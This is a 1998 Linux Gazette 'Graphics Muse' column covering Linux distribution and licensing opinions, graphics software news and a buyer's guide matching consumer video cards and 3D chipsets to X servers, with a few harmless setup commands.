Depends on what you want and where you live, mostly.  All three produce decent distributions.  I tend to think of Debian as aimed more towards the technical crowd, while the other two are more amenable to the average Joe.  I use Red Hat 4.2.  Why?  Because 2 years ago, when I was ready to upgrade from my Slackware distribution, I went into SoftPro Books in Denver and found Red Hat abundantly stocked.  S.u.S.E wasn't there yet.  Neither was Debian.  It was a simple choice back then, really.  But like Linux in general, the good news is that I have choices.  That's important.  I'll be upgrading again at the start of the year, probably in February.  By that time most of the kinks in dealing with libc/glibc should be worked out from the installation point of view.  I may go with Red Hat 5.2 if it's out by then.  But S.u.S.E sure has had a lot of good press too.  It probably doesn't matter that much.  I don't even use RPM's on my machine except during an initial installation.  After that, I install free software from source and commercial packages from CDs (in whatever form they come in).
GPL, LGPL, NPL, or Artistic License
See what I mean?  Choice.  This sort of thing seldom crops up in the Microsoft world.  Which is best?  I won't say.  Of all the arguments that have arisen repeatedly these past 2 years, this one is most certainly a matter of personal choice.  I will recommend, however, that if you consider releasing software to the free/Open community, you read through each of these and try to understand them before releasing and before creating your own license.  I did the latter.  It was a bad choice.
GPL:   http://www.gnu.org/copyleft/gpl.html
LGPL:  http://www.gnu.org/copyleft/lgpl.html
NPL:  http://www.mozilla.org/NPL/
Artistic:  http://language.perl.com/misc/Artistic.html
Where to go from here - Desktop Graphics

Ok, I've blabbered on for too long with my own opinions that really have nothing to do with graphics on Linux.  I need to focus.  What do we have now and what do we need?  How do we get it?  And who are "we"?

We are the people who desire the tools to do the graphics arts work from which we both find enjoyment and make our livings.  As of now, the tools for Linux are mostly geared toward Web development, a medium born from the same family as the images we create.  Most of the tools are command line driven, with a few GUI-based tools like the Gimp or perhaps ImageMagick.  But we lack certain features to go beyond Web images.  We lack any real form of color management in the Gimp, which is needed for prepress operations.  We have 3D modellers, but are they sufficient for commercial animation work?  And what about video editing tools?  Nothing exists at this point beyond one project in a very early stage.  We have some hardware acceleration for 3D video chipsets but lack consistent support from vendors.  Most important, we need a desktop that makes porting applications - or writing new ones - inviting to those who need to interact with other tools.

There are plenty of tools for commercial artists and effects houses that already exist on other Unix platforms.  What would it take to make those people want to migrate to Linux?  Vendors are fond of saying that end user demand is what drives ports to new platforms.  We need to know if the demand exists and, if not, why not.  I've spoken to two effects houses in the past who use Linux in rendering farms (groups of Linux servers number crunching 3D images with little to no user interaction).  Linux as a server once more.  Is Linux not appropriate as the front end of the special effects development process?  What about for Desktop Publishing?  All you Quark and Adobe users - what do we need?  Would you use the ports if they were made available?

I write this column out of a desire to learn about computer graphics.  The only graphics tools I'd ever used before moving to Linux were MacDraw and Micrografx under DOS many years ago.  I'm not familiar with the Adobe series of graphics programs, nor QuarkXPress, nor the SoftImage tools or other SGI-based applications.  I need feedback from users of these tools to know what to pass on to the rest of my readership.  There are likely to be a few who would be willing to work on projects, if they knew what needed to be done.  And grassroots efforts by end users to convince commercial vendors that ports of existing applications to Linux would be worth their effort are also needed.  Corel appears to be porting all their applications to Linux.  I assume this means Corel Draw will be coming out sometime in the next 6 months.  At least then I can see what a commercial application looks like.  If I could only get my hands on Adobe Premiere or QuarkXPress for Linux.....

Most important of all, I need to know what the readers need - desktop tools for the small prepress environment?  Web tools?  High end graphics tools for research and the entertainment industries?  Perhaps multimedia authoring tools?  Or just simple tools for doing common tasks at home, those that are readily available for the Mac and MS platforms and cost a buck and a quarter at the local computer retail outlet.

Graphics on Linux needs focus.  We have the kernel supporters and the desktop supporters who have driven the server side of Linux to the point that the rest of the world is not only aware of Linux but enthusiastic about joining the community.  Now we need the graphics folks to mobilize and show that we can go beyond the realm of back room servers.

Or can we?

[ More Musings ]
 


The following links are just starting points for finding more information about computer graphics and multimedia in general for Linux systems. If you have some application-specific information for me, I'll add it to my other pages, or you can contact the maintainer of some other web site. I'll consider adding other general references here, but application- or site-specific information needs to go into one of the following general references and not be listed here.
 
Online Magazines and News sources 
C|Net Tech News
Linux Weekly News
Slashdot.org

General Web Sites 
Linux Graphics mini-Howto
Unix Graphics Utilities
Linux Sound/Midi Page

Some of the Mailing Lists and Newsgroups I keep an eye on and where I get much of the information in this column 
The Gimp User and Gimp Developer Mailing Lists. 
The IRTC-L discussion list
comp.graphics.rendering.raytracing
comp.graphics.rendering.renderman
comp.graphics.api.opengl
comp.os.linux.announce

Future Directions

Next month:



© 1998 by Michael J. Hammel


Previous ``Graphics Muse'' Columns

Graphics Muse #1, November 1996
Graphics Muse #2, December 1996
Graphics Muse #3, January 1997
Graphics Muse #4, February 1997
Graphics Muse #5, March 1997
Graphics Muse #6, April 1997
Graphics Muse #7, May 1997
Graphics Muse #8, June 1997
Graphics Muse #9, July 1997
Graphics Muse #10, August 1997
Graphics Muse #11, October 1997
Graphics Muse #12, December 1997
Graphics Muse #13, February 1998
Graphics Muse #14, March 1998
Graphics Muse #15, April 1998
Graphics Muse #16, August 1998
Graphics Muse #17, September 1998
Graphics Muse #18, October 1998


Copyright © 1998, Michael J. Hammel
Published in Issue 34 of Linux Gazette, November 1998




 

Blender Manual
Moxy 0.1.2
Quick Image Viewer 0.9.1
GQView 0.4.3
FLTK 19981006
XawTV 2.28
jmk-x11-fonts 1.2
KIllustrator
MathMap
Metro-X 4.3
GNU PlotUtils 2.1.6
Simple DirectMedia Layer Version 0.8
tkscanfax
MAM/VRS
Xi Graphics
  • SiS 5598
  • NeoMagic, Toshiba, Gateway, benchmarks
  • 3D Hardware Support
  • Monthly drawing for FREE Accelerated-X
Disclaimer: Before I get too far into this I should note that any of the news items I post in this section are just that - news. Either I happened to run across them via some mailing list I was on, via some Usenet newsgroup, or via email from someone. I'm not necessarily endorsing these products (some of which may be commercial), I'm just letting you know I'd heard about them in the past month.

Blender Manual is now available for ordering
The Blender Manual is available for purchase:  http://www.blender.nl/shop/index.html.  Looks to be about $49US for a fairly hefty manual.


Moxy 0.1.2
Moxy is a linear video editor, much like Adobe's Premiere. It can load many different file formats (including MJPEG AVIs, P*Ms and JMF) and output AVIs. It comes with some transitions (you can make some yourself; they're plugins) and you are free to contribute code. 
http://millennium.diads.com/moxy/


Quick Image Viewer 0.9.1
Quick Image Viewer (qiv) is a very small and pretty fast GDK/Imlib image viewer.  Features include zoom, maxpect, scale down, fullscreen, brightness/contrast/gamma correction, slideshow, flip horizontal/vertical, rotate left/right, delete (move to .qiv-trash/), jump to image x, jump forward/backward x images, a filename filter, and you can use qiv to set your X11 desktop background.

This version works on Solaris/SunOS again.
http://www.geocities.com/SiliconValley/Haven/5235/



GQview 0.4.3
GQview is an X11 image viewer for the Linux operating system. Its key features include single click file viewing, external editor support, thumbnail preview, thumbnail caching and adjustable zoom. GQview is currently available in source, binary, and rpm versions and requires the latest GTK and Imlib libraries.

This release adds copy and move capabilities, the ability to hide the tools area, cancel thumbnail generation by pressing Escape, and more.
http://www.klografx.de/
http://www.geocities.com/SiliconValley/Haven/5235/



FLTK 19981006
FLTK (pronounced "fulltick") is an LGPL'd C++ user interface toolkit for X, OpenGL, and Microsoft Windows. FLTK is deliberately designed to be small, so that you can statically link it with your applications and not worry about installation problems. As a side effect it is also extremely fast.

On September 25, 1998, Digital Domain instructed Mr. Bill Spitzak to discontinue development of FLTK. Shortly thereafter a group of developers for FLTK reincarnated the library on a mirror site so that development could continue. The FLTK web page, FTP site, mailing list, and CVS server are being hosted by Easy Software Products, a small software firm located in Maryland. Easy Software Products develops commercial software and supports free software.
http://fltk.easysw.com/



XawTV 2.28
XawTV is a simple Xaw-based TV program which uses the bttv driver or video4linux. It contains various command-line utilities for grabbing images and avi movies, for tuning in TV stations, etc. A grabber driver for vic and a radio application (needs KDE) for the boards with radio support are included as well.
http://www.in-berlin.de/User/kraxel/xawtv.html


jmk-x11-fonts 1.2
The jmk-x11-fonts package contains character-cell fonts for use with the X Window System. The current font included in this package is NouveauGothic, a pleasantly legible variation on the standard fixed fonts that accompany most distributions of the X Window System. It comes in both normal and bold weights in small, medium, large, and extra-large sizes. Currently only ISO-8859-1 encoding is available.

New in this release of Jim's fonts for X is a set of alternate NouveauGothic fonts with a more traditionally shaped ampersand glyph, for those who don't particularly like the style of NG's regular ampersand.
http://www.ntrnet.net/~jmknoble/fonts/
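
If you haven't installed add-on X fonts before, the usual steps look like this (standard X11 utilities; the directory is just an example location):

# Build fonts.dir where the fonts were unpacked, then add that
# directory to the X server's font path and rehash.
cd /usr/local/share/fonts/jmk        # example location
mkfontdir
xset fp+ /usr/local/share/fonts/jmk
xset fp rehash
xlsfonts | grep -i nouveau           # confirm the new fonts are visible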



KIllustrator 0.4.1
KIllustrator is a freely available vector-based drawing application for the famous K Desktop Environment, similar to Corel Draw(tm) or Adobe Illustrator(tm). This version contains a new layer facility as well as some bug fixes and performance improvements.
http://wwwiti.cs.uni-magdeburg.de/~sattler/killustrator.html


MathMap 0.7

MathMap is a GIMP plug-in which allows distortion of images specified by mathematical formulas. For each pixel in the generated image, an expression is evaluated which should return a pixel value. The expression can either refer to a pixel in the source image or can generate pixels completely independent of the source. MathMap not only allows the generation of still images but also of animations.

The MathMap homepage can be found at http://www.unix.cslab.tuwien.ac.at/~schani/mathmap/ .  It includes a user's manual as well as screenshots and examples.

Changes since 0.6:

Mark Probst



METRO-X 4.3

The following announcement was posted to comp.os.linux.announce by MetroLink, Inc.

NOW AVAILABLE FOR LINUX/ALPHA!

The Metro-X Enhanced Server Set from Metro Link is now available for Linux/Alpha.  Metro-X provides more speed and more features at a very LOW PRICE!

Metro-X 4.3 is an X11 Release 6.3 server replacement with all the features you need.  It provides support for the fastest, most  popular graphics cards on the market today. In addition, Metro-X includes touch screen support and multi-screen support at no extra charge!  So what IS the charge?  Only $39!

===GRAPHICAL CONFIGURATION UTILITY===

Forget hand editing configuration files or clumsy character-based setup utilities.  Metro-X 4.3 includes a state-of-the-art graphical configuration program.  ConfigX helps you get up and running in no time.

===EXTENSIVE GRAPHICS CARD SUPPORT===

Want support for the latest, highest-performance graphics cards? Then you want Metro-X 4.3.  Check the Metro-X 4.3 cardlist for Linux/Alpha on the web site to see which cards are supported, as well as the available resolutions and colors for each.  In addition, as support becomes available for new cards between releases, these updates to Metro-X 4.3 will be made available at no charge.

===MONITOR SUPPORT===

Tired of adjusting your monitor or hand-editing timing parameters? With Metro-X you can relax.  Just select your monitor from the list and we do the rest.  Even adjusting the image is made easy with a graphical adjustment tool.  Using the mouse or keyboard, you simply stretch, shrink, or shift the image placement on the monitor!

===TOUCH SCREEN SUPPORT INCLUDED===

At no extra charge, Metro-X 4.3 includes support for several models of touch screens.  These include the serial touch-screen controllers from:

===MULTI-HEADED DISPLAY SUPPORT INCLUDED===

At no extra charge, Metro-X 4.3 includes support for up to 4 screens per server which can all be controlled simultaneously with a single keyboard and mouse.  This allows you to run many applications without overlapping windows.  The graphical configuration utility makes it simple to configure multiple graphics cards and even lets you pick the screen layout.  You can utilize this feature with many combinations of these cards:

 NOTE: Only one Mystique or Mystique 220 (not both) may be used in the combination.

===ROBUST PERFORMANCE===

Reliability and performance are the foundation of Metro-X.  Our customers are using Metro-X in demanding applications from the Space Shuttle to the Battlefield.  Metro-X 4.3 incorporates advanced dynamic loader technology which eliminates the need to build servers for specific types of graphics cards.  It makes server configuration quick and easy.

===METRO OPENGL EXTENSION AVAILABLE SOON===

Using Metro-X's dynamic loader technology, adding an extension like Metro OpenGL is as easy as installing a package and running a program.  This product will be available for Linux/Alpha very soon.

===METRO LINK TECH SUPPORT===

As always, software purchased from Metro Link comes with 90 days of free technical support (via phone, fax, or email) and a 30-day money-back guarantee.

===SYSTEM REQUIREMENTS===

HARDWARE:  Metro-X 4.3 requires 14 MB of disk space. 8MB of RAM are required; 16 MB are recommended.

SOFTWARE:  Packages are provided in both RPM and tar/gzip formats.  Metro-X 4.3 requires these minimum versions of software: Linux Kernel 2.0.30; glibc 2.0.5c; and XFree86 3.3.1.

===AVAILABILITY AND DISTRIBUTION===

PRICE:  Metro-X 4.3 is $39

AVAILABILITY: Now

DISTRIBUTION:  Metro-X is only distributed via FTP.  A PostScript version of the Metro-X manual is included.  With a credit card payment, the FTP instructions are usually emailed on the same day the order is received.  Be sure to include your email address when ordering.

===CONTACT METRO LINK===

www.metrolink.com

+1-954-938-0283 ext. 1
+1-954-938-1982 fax



GNU PlotUtils 2.1.6

Version 2.1.6 of the GNU plotting utilities ("plotutils") package is now available.  This release includes a significantly enhanced version of the free C/C++ GNU libplot library for vector graphics, as well as seven command-line utilities oriented toward data plotting (graph, plot, tek2plot, plotfont, spline, ode, and double).  A 130-page manual in texinfo format is included.

As of this release, GNU libplot can produce graphics files in Adobe Illustrator format.  So you may now write C or C++ programs to draw vector graphics that Illustrator can edit.  Also, the support for the free `idraw' and `xfig' drawing editors has been enhanced.  For example, the file format used by xfig 3.2 is now supported.
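
Once installed, exercising the package is a one-liner; for example (data.txt is a placeholder for a two-column ASCII data file):

# Plot a two-column ASCII data file to PostScript
graph -T ps < data.txt > plot.ps

# New in this release: Adobe Illustrator output from the same data
graph -T ai < data.txt > plot.ai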

RPMs for the plotutils package are available at ftp.redhat.com and at Red Hat mirror sites.  The following are available:

ftp://ftp.redhat.com/pub/contrib/i386/plotutils-2.1.6-1.i386.rpm
ftp://ftp.redhat.com/pub/contrib/sparc/plotutils-2.1.6-1.sparc.rpm
ftp://ftp.redhat.com/pub/contrib/SRPMS/plotutils-2.1.6-1.src.rpm
For more details on the package, see its official Web page, http://www.gnu.org/software/plotutils/plotutils.html .

I hope you find this release useful (send bug reports and suggestions for enhancement both to and to me).  Enjoy.
Robert S. Maier -



Simple DirectMedia Layer Version 0.8

This library is designed to make it easy to write games that run on Linux, Win32 and BeOS using the various native high-performance media interfaces (for video, audio, etc.) while presenting a single source-code-level API to your application.  This is a fairly low-level API, but with it completely portable applications can be written with a great deal of flexibility.

SDL has been split into a stable release, 0.8.x, and a development release, 0.9.x. The stable version is very robust, having been extensively tested over the past 3 months. The development version has some exciting features in progress, such as automatically adjusting to display changes, CD-ROM support, and more.

Get it now from:  http://www.devolution.com/~slouken/SDL/

GIMP lovers, grab your brushes!
The "Official SDL Logo Contest" is now in session.  Send your entries, or instructions on downloading your entries, via e-mail to   The winner will get his or her logo on the SDL web site, and will get their names in the CREDITS list for the next version of SDL!  You can view the contest entries at http://www.devolution.com/~slouken/SDL/contest/.

And if you're wondering "what can I really do with SDL?", be sure to download the examples archive, which contains demonstrations of:

If you are interested, join the development mailing list by sending e-mail to: 

Enjoy,  Sam Lantinga <>



tkscanfax
tkscanfax provides a combined GUI, written in Tcl/Tk, for a command-line scanner driver and mgetty+sendfax. It is a continuation of tkscan-0.8; this version adds an mgetty+sendfax GUI combined with tkscan so that faxes can be scanned directly from tkscan.

It is available from http://muon.kaist.ac.kr/~hbkim/linux/tkscanfax and also from the apps/graphics/capture directory at Sunsite.

There is no documentation at this time.  Please send questions, problems, comments or suggestions to Hang Bae Kim <>



MAM/VRS

MAM/VRS is a library for animated, interactive 3D graphics, written in C++. It works on Unix (tested on Linux, Solaris and Irix) and Windows 95/98/NT. MAM/VRS can produce output for many rendering systems: OpenGL (or Mesa), POVRay, RenderMan and VRML are supported. It provides bindings to many GUIs: Xt (Motif/Lesstif/Athena), Qt, Tcl/Tk, MFC and soon Gtk. It is covered by the terms of the GNU LGPL. Visit our homepage for more information and to download it:

http://wwwmath.uni-muenster.de/~mam
Though this is the first public announcement, MAM/VRS has been in active development and use for a long time and is stable. MAM/VRS is not a 3D modeler or a 3D CAD/CAM program, but it ...

Xi Graphics

There was a slew of announcements from Xi Graphics posted to comp.os.linux.announce this past month.  I've globbed them together here under a single section. - 'Muse

SiS 5598 support

Xi Graphics made SiS 5598 support available on September 14th, joining the previously supported SiS 6326.  Configurations for 1, 2, 3 and 4MB are supported.

The SiS 5598 is not capable of supporting overlays but does support hardware gamma color correction in all color depths.  Maximum supported resolution is 1600x1200@60Hz in 8bpp, and 1024x768@75Hz in 24bpp (packed) operation.  Hardware cursor is supported in all color depths.  The Accelerated-X Server conforms to the X Window System as measured by the freely available X Test Suite.

The update, which should be applied against the desktop (AX version) Accelerated-X Server version 4.1.2, is available from the Xi Graphics Anon-FTP site at URL:

ftp://ftp.xig.com/pub/updates/accelx/desktop/4.1.2/D4102.013.tar.gz
Instructions for applying the update and more detail may be found in the URL:
ftp://ftp.xig.com/pub/updates/accelx/desktop/4.1.2/D4102.013.txt
The update may be applied to the freely available Accelerated-X demo at URL ftp://ftp.xig.com/pub/demos/AX412.Linux.tar.gz for customer testing prior to purchase of the product.
NeoMagic MagicMedia, including Toshiba Tecra 800 and the Gateway Solo 5150
Xi Graphics is pleased to announce the release of support for the NeoMagic MagicMedia 256AV, also known as the NM2200 and the NM2360.  This is much faster than previous NeoMagic chipsets, as the new benchmarks show.  The initial machines explicitly supported are the Toshiba Tecra 8000 and the Gateway Solo 5150.

Benchmark tests were conducted on a Toshiba Tecra 8000 with a Pentium II/266 MHz processor, making the results broadly comparable with those for the ATI Rage LT Pro announced in August.  The Accelerated-X Server, Xaccel, passes the X Test Suite with hardware acceleration in all color depths.

Accelerated-X/OGL
Xi Graphics, leader in X Window System technologies for Intel Linux and UNIX systems, will be shipping a limited-quantity Technology Demo edition of its new Accelerated-X/OGL product.

Accelerated-X/OGL is the fifth architecture generation of Accelerated-X and has been specifically altered to provide support for a wide range of 3D graphics chips.  The limited-edition Technology Demonstration release offers an opportunity for game and other developers to influence the final delivered product.  The Accelerated-X/OGL Technology Demo Evolution 1 product features:

For this limited edition of the product, please contact to apply for a copy.  Xi Graphics Sales is unable to take orders for this product, as we expect the demand to significantly exceed the supply!
Monthly drawings for copies of Accelerated-X
Xi Graphics is pleased to announce that we're giving away free copies of the industry leading Accelerated-X Display Server.  These are full, up to date, legal and supported copies of the product.

To register to win one of the two free copies we're giving away every month, either register for the monthly draw on our web site (http://www.xig.com) or send email following the directions published below.  We do, of course, have a motive for this.  We want to know what Graphics Board, Monitor, Input devices and Operating Systems you'd most like to use with Accelerated-X and we want to find out about the kind of machine you use.

To enter the drawing by email, you must complete an entry form for that month's draw.  Send the email to Andrew Bergin () with the subject "Free Draw Entry" and include in your message the following details:

Your Name
Your Company or Organisation
Your Shipping Address
Your Email Address
(Optional) Your Web Site Address
What make and model of computer, and processor speed
The Graphics Card you'd like to use
The Monitor you'd like to use
Your preferred pointing devices
Your preferred operating system
There will be a new draw every month.  You must enter each month to be eligible for that month's drawing.  Only one submission per person, per drawing, will be accepted.

The winner's name may be put on our web site and in other promotional material.  Information collected, including your email and physical shipping addresses, will not be sold to any third party.  We may use your address for our infrequent mailings unless you write to ask us to remove your name from the mailing list.

Xi Graphics will pay the cost of shipping only, including international shipping.  Any and all customs charges and/or taxes are the responsibility of the winner.

Off the shelf video cards:  Choosing the right solution the first time.
Metro Link X Input Support
more musings...


Off the shelf video cards:  Choosing the right solution the first time

Video cards have come a long way in the past two years.  Back then, a video card was considered top of the line if it handled generic 2D acceleration features, and state of the art meant the first of the new generation of 3D accelerators.  These days 2D acceleration is commonplace and an expected feature of video cards, and 3D acceleration is not only more common but more standardized.  In this article we'll take a look at finding off-the-shelf video cards, that is, video cards available from your local computer retailers or by mail order, and how to match those cards with an X server.

A little background

X servers are the device drivers used in conjunction with video cards to display your windowing system under Linux.  Unlike the Microsoft world, where each card has its own driver, X servers tend to support many cards with a single driver.  For example, the XF86_SVGA server from the XFree86 distribution supports many older SuperVGA cards plus the more advanced Matrox Millennium and Mystique cards.  Xi Graphics' Accelerated-X server supports all of its cards with a single server that dynamically loads modules depending on which video card you happen to be using and have configured.  The trick is to understand which X server to use for the video card you have.

Since X servers work with more than one card, they tend to list which video chipsets they support.  This is because many cards use similar chipsets, and it is difficult for X server vendors, who until recently had to work independently of the video card manufacturers much of the time, to keep up with all the different video card product names.  Video card manufacturers tend to use the same, relatively small, set of video chipsets across their product lines, so having a single X server handle an entire line makes more sense than having individual drivers for every card.
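
On an XFree86 system you can usually tell which of these servers is active, since the X binary is normally a symlink to one of them (paths assume a standard XFree86 installation):

# Which XFree86 server is the active one?
ls -l /usr/X11R6/bin/X          # e.g. X -> /usr/X11R6/bin/XF86_SVGA

# Which servers are installed?
ls /usr/X11R6/bin/XF86_*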

Why am I doing this?

Ordinary users don't really know about chipsets; they only see the card names from manufacturers:  ATI Graphics Pro Turbo or Hercules Dynamite, for example.  Additionally, video card manufacturers are notorious for NOT specifying the chipsets they use in their cards.  They also tend to hide minor video card differences behind name changes and pricing differences; it's called carrying a product line.  Video hardware vendors are used to delivering device drivers with their hardware for the traditional desktop user, i.e., Microsoft users.

X servers are written by individuals or groups, outside the hardware vendors' control, with chipsets in mind.  The servers (we call them servers because of the underlying X Windows architecture, but they are still just device drivers) are distributed on their own, not with the video hardware.  This is mostly because hardware vendors, in the past, saw little market demand for doing the work on the X servers themselves, so external parties had to do the work on their own.

So video hardware vendors sell video cards based on product names without X servers, and X server software is written and described in terms of chipsets rather than specific video cards.  Confused?  You're not alone.  So how does an end user reconcile these different approaches and find a working combination of video card and X server?  This article won't give absolute answers for all the cards available off the shelves, but it will help educate new users about how things work and what to look for when preparing to make a new video card purchase.

I assume here that you're reading this with an intent to purchase a new video card sometime in the near future, or that you have done so in the recent past and are trying to figure out how to make it work under X Windows with Linux.

What's the deal with all the 3D stuff?

3D hardware accelerators are hot items.  You can hardly find video cards on the shelves of your local retailers that don't mention some form of 3D support or features.  But what exactly is 3D?  And more important, do you need it?

3D cards often provide at least some of the following hardware acceleration features:

Fast computation of 3D objects.

3D objects are made up of any number of various sized triangles.  Computing the position and size of these triangles is very computationally expensive.  3D video cards can help speed up those computations.
Texture map memory.
You'll often hear individual units of texture memory referred to as texels.  These are used to speed up the mapping of images onto flat surfaces, a trick often used for high-speed motion.  It is much slower to generate a tree, for example, from a large number of individual triangles than from one large flat one with a picture of a tree on it.  Done properly, you might not even be able to tell this trick has been used.
Z-buffering.
The mapping of images into 3D space in video memory.  If you think of 2D space as the XY axis of a coordinate plane then the Z axis would be used to show distance in 3D space.
Flat and Gouraud shading.
The latter is what gives a smooth 3D appearance to a sphere, for example.
Shadow mapping.
This allows programmers to associate shadows with objects without having to calculate the shadow at run time.  Shadows are cast via calculations of how light moves in 3D and that can be very computationally expensive.
Bilinear filtering.
A technique that reduces artifacts when small graphics are scaled up.
Many cards provide far more features than this as well, all of which have to do with taking an object described in 3D space and displaying it (and other objects) on a flat 2D monitor.  Older 3D cards - those over a year or so in age - often had their own proprietary interface for accessing the accelerated features.  These have recently been superseded by more popular interfaces (called APIs, for Application Programming Interfaces) such as OpenGL (or Mesa, a free implementation of OpenGL) or the 3Dfx Glide interface.

Making use of 3D hardware acceleration requires that you have

  1. An X server or other video driver that can drive this card.
  2. Application software that knows how to speak the API for that card.  Usually this is an application that speaks OpenGL/Mesa or Glide on Linux systems.  The way this works is that the application speaks the API language only and doesn't care if 3D acceleration is done in hardware or software.  The API, i.e., OpenGL or Glide, then understands how to use hardware acceleration.  In some cases this will be by direct support from the X server and in other cases it will be by utilizing a separate driver for the 3D card.


    There are also cards that support Microsoft's Direct3D API, an alternative to the OpenGL API.  Don't bother with these cards if you are looking for 3D acceleration: as of now there are no Linux drivers for them, and no applications on Linux speak this API language either.

At the moment there are not that many OpenGL/Mesa applications that end users might be interested in.  A few 3D modellers, such as AC3D or 3dom, use OpenGL, but most of the support for OpenGL comes in the form of windowing toolkit extensions.  These are developers' tools and beyond the scope of this discussion.
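
If you're wondering whether an OpenGL or Mesa library is already on your system, the dynamic linker's cache is one quick place to look (library names vary; libMesaGL is typical for Mesa of this vintage, so treat the search pattern as an assumption):

# List GL libraries known to the dynamic linker
ldconfig -p | grep -iE 'mesagl|libgl'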

3D video cards under Linux normally work in one of three ways:

  1. multiple cards using pass-through cables
  2. multiple cards using multiple monitors
  3. single card handling both 3D acceleration and standard SVGA (2D) acceleration
In the first two cases you have two cards:  your regular VGA/2D card and the 3D video card.  You would have an external driver that runs the 3D card while using your X server to drive your regular video card.  This is how the early support for Voodoo cards (Voodoo is a chipset from 3Dfx used in various 3D cards produced by other manufacturers) in Mesa worked (see the 3Dfx HOWTO).  With pass-through cables you have your regular VGA output passed through your 3D card, which passes it directly to its output port unless a 3D driver has turned the card "on".  Once enabled, the 3D card ignores the signal coming from the 2D card.  This works fine most of the time, unless your 3D application dies and doesn't tell the 3D card to start passing through the 2D signal again.  In either case where multiple cards are used, the standard VGA card knows nothing about the 3D card and works just like it always has.

If your X server supports the 3D card directly you can skip using two cards and run just the 3D card.  In some situations you won't get the 3D acceleration but will get to use the generally faster 2D features of that card.  And there are some X servers that will provide the 3D acceleration too, so you get the best of both worlds.

Hardware issues of 3D cards

These 3D video cards come in both PCI and the new AGP bus flavors.  AGP is Intel's Accelerated Graphics Port, which allows faster throughput between the CPU and the graphics card.

Older cards used VRAM or EDO DRAM memory.  Newer cards run the faster SVRAM or SGRAM.  Not being hardware literate, all I can say is that SGRAM is reported to be much faster due to the way it is more closely tied to the video processor than the other forms of video memory.  I asked Jeremy Chatfield at Xi Graphics and Paul Sargent at 3Dlabs for an explanation of these memory types.  Jeremy provided the following answer:

Basic differences:

Paul provided similar information but in quite a bit more detail.

Some 3D cards also offer NTSC output plugs so you can connect the card to a TV, presumably to get a larger physical screen (although at the same resolution).  I've never seen this in use, however, so I can't really say much about it.

Do you need 3D acceleration?

For the most part, no.  Outside of games or visualization software it doesn't come into play much for the average Linux user.  For example, it doesn't speed up word processing, the Gimp, or POV-Ray renders (which are CPU and memory bound).  If you *are* into games or need off-the-shelf 3D support for visualization software (i.e., realtime 3D rendering with OpenGL or Mesa), then it can provide significant increases in rendering speed.  The problem is that support for 3D hardware acceleration is just beginning to show up within the X servers themselves, and running concurrent video cards (one for 2D and one for 3D) is not for the technically challenged.

Instead, look to these cards for their future potential.  Cards that support either OpenGL (which is likely to be around for some time) or 3Dfx's Glide API (which is quite popular with game enthusiasts on non-Unix platforms) are your best bet right now.  Additionally, their increased 2D acceleration will be a significant benefit in your day-to-day use.

What happened to 2D?

Nothing; it's still there, and basically everybody supports it now.  2D acceleration has to do with generic drawing operations, such as line drawing, which speed up the drawing of windows, for example.  Any modern card - something made within the past two years - will support 2D acceleration.  The advantage of newer cards is that they use faster memory and better acceleration for these 2D effects, so ordinary use of windowing applications will look and feel much improved over older cards.

Most cards now come with 1MB or 2MB of memory, which will get you resolutions of about 1024x768 @ 65K colors.  But the cost of these cards has dropped drastically in the past year or so, and a card with 4MB of video memory will get you 1280x1024 @ 16 million colors, certainly good enough for most applications and reasonably affordable monitors.  Go higher (8MB of memory or more) only if 3D work is of real importance to you or if you expect to have very large displays running at full 24-bit color depths.
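
If you want to sanity-check those numbers yourself, framebuffer memory is roughly width x height x bytes per pixel.  A quick sketch with shell arithmetic (packed 24-bit mode assumed for the 16-million-color case; cards also reserve some memory for themselves):

# 1024x768 at 16 bits per pixel (65K colors):
echo $((1024 * 768 * 2))      # 1572864 bytes, about 1.5MB -- a 2MB card suffices
# 1280x1024 at 24 bits per pixel, packed (16M colors):
echo $((1280 * 1024 * 3))     # 3932160 bytes, about 3.75MB -- fits on a 4MB card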

What are currently the popular chipsets?

There are lots of other chipsets for various other cards, but these seem to have the most noise being made about them in the press and certainly the biggest presence in cards available at local retail outlets.

What is on the shelves now?

Note that this is based only on what I found at three local retailers (although all three are national in scope) or via C|Net's Computers.com.  Also, prices vary depending on the amount of video memory on the card, so just use these prices as guidelines.  All prices are in US dollars.  I've tried to list the chipsets for these cards where I could find them.  Finally, these cards may be PCI, AGP or both - you'll have to check on that aspect on your own.
 

Video Card Chipset Price
ATI All in Wonder  3D Rage II $125
ATI All in Wonder Pro  3D Rage Pro $151
ATI Xpert@Play PCI and AGP 3D Rage Pro $150
ATI Xpert 98 ATI Rage Turbo $90
Creative Labs Graphics Blaster Extreme, Professional Edition Permedia 2 $183
Creative Labs Graphics Blaster Extreme, Value Edition Permedia 2 $53
Creative Labs Graphics Blaster  RIVA TNT $175
Diamond Stealth II S220 Rendition Verite $100
Diamond Monster 3D 3Dfx Voodoo $250
Diamond Monster II Voodoo 2 $250
Diamond Viper V330 RIVA 128 $130
Diamond Fire GL 1000 Permedia 2 $???
Diamond Fire GL 1000 Pro Permedia 2 $144
Diamond Stealth 2000 S3 ViRGE $???
Elsa GLoria Synergy Permedia 2 $120
Elsa WINNER 2000 / Office Permedia 2 $???
Hercules Dynamite 3D/GL Permedia 2 $180
Hercules Thriller 3D Rendition V2200 $109
Hercules Terminator 2X/i  Intel i740 $80
Hercules Stingray 128 3D Unknown $160
Hercules Terminator Beast  S3 Savage 3D $120
Jaton S3 Video S3ViRGE/DX $40
LEADTEK WinFast 2300 Permedia 2 $???
Matrox Mystique G200 MGA-G200 $150
Matrox Millennium G200 MGA-G200 $150
STB Velocity 128 RIVA 128 $150
STB Velocity 4400 RIVA TNT $200

It's interesting to note the differences between cards from the same companies.  For example, upon examining the packaging for the Matrox Mystique and Millennium, the only differences I could find were that the Mystique runs at 230MHz and has S-Video and Composite outputs, whereas the Millennium runs at 250MHz and does not.

Again, these are the off-the-shelf, "affordable" cards.  Really high-end cards can run into the $2000-$3000 range and higher, and chances are slim that most of those cards have X server support yet.  And there are plenty of other cards out there too - like I said, vendors love to change minor details and release the result as a whole new product.

What do the various vendors currently support?

OK, so now you know a little about what video cards are currently available and a little about the 2D/3D technology being used in them.  How does this map to the available X servers?  That depends on which server vendor you want to use.  In this article we consider four vendors:  XFree86, S.u.S.E. (for their binary-only servers that currently require non-disclosure agreements), Xi Graphics and MetroLink.

Of all the vendors, MetroLink made it the easiest to find card names from their web site.  SuSE's site was pretty good about it too.  Xi Graphics has a fairly decent lookup system, but they mix chipsets with board vendors and if you don't know what you're looking for it can be a bit confusing since they support so many variations.  XFree86, although they have plenty of documentation, do not make it simple to match a card by name with a driver.  Give them credit for writing great software - now they need someone to organize and collate all that documentation on their web site for the average user.

